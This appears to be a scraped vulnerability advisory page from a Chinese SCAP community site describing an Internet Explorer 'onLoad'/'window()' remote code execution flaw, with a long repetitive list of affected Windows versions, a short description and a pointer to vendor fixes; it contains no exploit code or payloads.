- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
+ Microsoft Windows ME
+ Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
Microsoft Internet Explorer 6.0 SP2 - do not use
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional

- 漏洞讨论

Microsoft Internet Explorer is affected by a remote code execution vulnerability.

This vulnerability presents itself when the browser handles a JavaScript 'onLoad' handler in conjunction with an improperly initialized 'window()' JavaScript function.

This issue may be exploited to execute arbitrary remote code in the context of the user running the affected application. Failed exploitation attempts likely result in the application crashing.

- 漏洞利用

The following exploits are available:

- 解决方案

Microsoft has released fixes for supported operating system versions. Fixes for Internet Explorer 5.5 SP 2 running on Windows ME and Internet Explorer 6 SP 1 running on Windows 98/98SE/ME can be obtained through the Microsoft Update Web site or the Windows Update Web site.

Avaya has released advisory ASA-2005-234 detailing affected Avaya products. Please see the referenced advisory for further information.


Microsoft Internet Explorer 6.0 SP1

Microsoft Internet Explorer 6.0

Microsoft Internet Explorer 5.0.1 SP4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站